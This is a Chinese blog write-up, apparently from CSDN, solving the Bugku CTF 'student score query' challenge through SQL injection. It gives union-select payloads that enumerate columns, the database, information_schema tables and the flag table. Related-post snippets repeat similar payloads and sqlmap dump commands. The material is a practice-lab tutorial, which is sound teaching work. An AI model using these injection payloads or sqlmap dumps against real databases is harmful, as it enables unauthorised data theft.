Bugku Web CTF-学生成绩查询

最新推荐文章于 2025-06-11 18:05:00 发布

河鱼不高兴

最新推荐文章于 2025-06-11 18:05:00 发布

阅读量1.3k

点赞数 1

CC 4.0 BY-SA版权

分类专栏： web ctf

本文链接：https://blog.youkuaiyun.com/saislanti/article/details/103566135

web ctf 专栏收录该内容

17 篇文章

订阅专栏

本文详细解析了BugkuWebCTF平台上的学生成绩查询题目，通过SQL注入技巧，逐步猜解数据库结构，最终成功获取flag，展示了SQL注入攻击的实际操作流程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Bugku Web CTF-学生成绩查询

该题解题思路是SQL注入，测试思路如下：。
直接输入’单引号没有回显；
输入’#有回显；
通过union来猜解该表有多少列：

0' union select 1,2,3,4#

可正常回显，其余不行，猜测该表有4列，分别为id，Math，English，Chinese。
获取数据库名：

0' union select 1,user(),database(),version()#

可得到数据库名为skctf_flag。
知道了数据库名，从中获取表名：

0' union select 1,2,3,(select table_name from information_schema.tables where table_schema='skctf_flag' limit 1)#

拿到一个名为fl4g的表，直接获取表中数据：

0' union select 1,2,3,(select * from fl4g)#

（恰好fl4g表只有一行一列数据所以该语句能成功执行）最终拿到flagBUGKU{Sql_INJECT0N_4813drd8hz4}。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

河鱼不高兴

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Bugku-成绩查询

qq_51553814的博客

07-15

526

Bugku-成绩查询本题主要考点是sql注入，一个很简单的字符型注入，没有屏蔽任何字符使用sqlmap更简单，但是为了熟悉和复习还是决定自己做。解题方法打开环境，如图是一个需要用户输入的文本框，看到题目和文本框，首先就能想到sql注入根据题目要求尝试输入1试试，返回了下面一个页面接下来就要判断它是属于什么类型的注入了，先输入一个 1’ ，发现页面没有返回，再输入1’ #，返回正常页面基本可以确定是字符型注入了，并且一番确认后发现，没有屏蔽任何的字符，所以这题应该就是一道入门的sql字符注入题

[Bugku] web-CTF靶场系列系列详解⑥！！！

muyuchen110的博客

08-09

1167

【代码】[Bugku] web-CTF靶场系列系列详解⑥！！！

参与评论您还未登录，请先登录后发表或查看评论

Bugku：web 成绩单

qq_26961571的博客

06-23

352

从这里开始进入SQL注入的普通模式啦！！撒花~~ 虽然真的学过数据库，可是需要有很熟悉的PHP和数据库变量名字的理解，大概才能很好的学习这个部分。首先打开这个题目，快来查查成绩吧！这里还是有一些提示的，框框里面要求输入1,2,3这种数字以便查询。但是...我们怎么能用普通的思维呢？？？！！那么先什么都不输入看看。什么都木有啊！还是输个1看看。接下来输了2和3也是有数据的，4就没有数据了，感觉这个数据库表...

知名CTF赛事发布网站（非常详细）零基础入门到精通，收藏这一篇就够了

最新发布

shandongjiushen的博客

06-11

321

2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.写在最后的话：“。祝你，祝我，祝我们，不管过去还是现在，科学都是对一切可能的事物的观察。所谓先见之明，是对即将出现的事物的认识，而这认识要有一个过程。

BUGkuCTF-成绩查询

dfhjlll的博客

12-21

743

输入1 出来界面,猜测应该是sql注入,看源码是post注入, 输入id=1’,没有出来成绩单,是单引号注入加上注释符,然后使用union select 1,2,3,4一次次尝试,在输入5的时候没有成绩,猜测是5列,查出来库的名字后往下就是纯粹的sql注入了,查表,查列,就能查出来flag了 ...

成绩查询（bugku ctf）

2301_81486667的博客

04-28

1680

python sqlmap.py -r "D:\桌面\1.txt" -D skctf -T fl4g -C “skctf_flag” --dump。python sqlmap.py -r "D:\桌面\1.txt" -D skctf -T fl4g --columns。python sqlmap.py -r "D:\桌面\1.txt" -D skctf --tables。python sqlmap.py -r "D:\桌面\1.txt" --dbs。然后输入：python --version。

Bugku CTF_Web——成绩查询

weixin_71914594的博客

10-27

570

（学会使用sqlmap神器）读取一下skctf_flag。看样子在skctf里。

Bugku CTF-web17 成绩单

weixin_44023403的博客

05-15

421

Bugku CTF-web17成绩单前言一、pandas是什么？二、使用步骤1.引入库2.读入数据总结前言提示：这里可以添加本文要记录的大概内容：例如：随着人工智能的不断发展，机器学习这门技术也越来越重要，很多人都开启了学习机器学习，本文就介绍了机器学习的基础内容。提示：以下是本篇文章正文内容，下面案例可供参考一、pandas是什么？示例：pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。二、使用步骤 1.引入库代码如下（示例）： import numpy

CTF——web安全（六）

qq_45215609的博客

04-26

470

CTF——web安全（六）题目一：成绩查询

bugku CTF题

qq_46116117的博客

04-06

1121

web题矛盾： !is_numeric（）函数：用于检测变量是否为数字或数字字符串如果指定的变量是数字和数字字符串则返回 TRUE，否则返回 FALSE 需要num不为数字字符串或者数字，但num=1; 则，num=1*e0.1或num=1x,x为任意字符 web3 查看源代码得 <!--KEY{J2sa42a&

bugku web/crypto 系列题目思路总结（三）

yukinorong的博客

08-07

702

bugku 告诉你一个秘密参考博文：https://www.jianshu.com/p/3cacf1dd479c 需要了解base64编码特征才能想到。利用键盘位置做密码很巧妙。 bugku 这不是md5 确实不是md5，十六进制字符串直接转字符即可。 bugku 贝斯家族 base编码系列除了64之外还有16 32 36 58 62 91等。后面的数字为用于编码的种类，数字越大，一般来讲编码...

bugkuctf解题-WEB

05-04

bugku writeup，web解题writeup，根据网上的writeup自行解题后整理的日记，与大家分享，大家有新方法的也可以评论中告诉我，共同进步。——CTF菜鸟敬上。

CTF WEB题型总结第六课实战练习(二) - 入门第一部分

入门第一部分主要介绍了一个名为"bugku-ctf"的CTF web题库，其中包含了多个题目供练习。第一个题目是"成绩单"，具体内容和解题思路未在此文档中给出。第二个题目是"秋名山老司机"，同样缺乏具体描述和解题思路。 ...

bugkuCTF学生成绩查询writeup----sqlmap注入

qq_41492160的博客

12-08

2264

1.题目 2.查看是否存在注入漏洞测试：如果id=1后面加‘ 不正常加-- l恢复正常，说明存在数字型漏洞两个都不正常说明不存在数字型注入如果 id=1后面接 and 0 页面没有内容 and 1 页面正常显示内容说明有数字型漏洞如果都不正常说明没有数字型漏洞 3.存在漏洞找注入点使用burpsui...

Bugku——成绩单（web）

csu_vc的博客

10-27

2417

可以大概判断出有四个字段直接上payload-1' union select 1,2,3,database()# -1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#-1' union select 1,2,3,group_conc

Bugku web 成绩单

S123KO的博客

08-24

348

本题直接在页面中的查询栏输入： 1' order by 4# （求出列数4列） 1' and 1=2 union select 1,2,3,4# （求显示位） 1'and 1=2 union select 1,2,database(),4# （求出数据库skctf_flag） 1'and 1=2 union select 1,2,3,group_concat(table_name)from...

bugku ctf 成绩单 (类似sql注入)

qq_42777804的博客

08-15

1140

原始界面与以往的sql注入不同，直接在成绩查询栏中注入随便输入数字发现居然会出现显示位之后猜测应该有3个以上的显示位，因为成绩就已经有了3个 ?id=1' union select 1,2,3# 发现没有反应那么就四个 ?id=1' union select 1,2,3,4# 发现了4个，那我们就用最后一个先...

bugku ctf 成绩查询解题思路

YouthBelief的博客

03-08

1269

0x00 环境地址 https://ctf.bugku.com/challenges/detail/id/84.html 成绩查询大概率sql注入 0x01 解题思路 1.1 根据提示输入1 2 3 测试正常数据 1 2 看来是根据id查询 1.2 测试是否报错（不产生报错） ' " ') ") % %) )) 等等 1.3 猜测sql语句为 select Math_score,English_score,Chinese_score from score_table where

bugku--成绩查询

hxhabcd123的博客

08-28

1876

该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程，以及采用sqlmap工具解题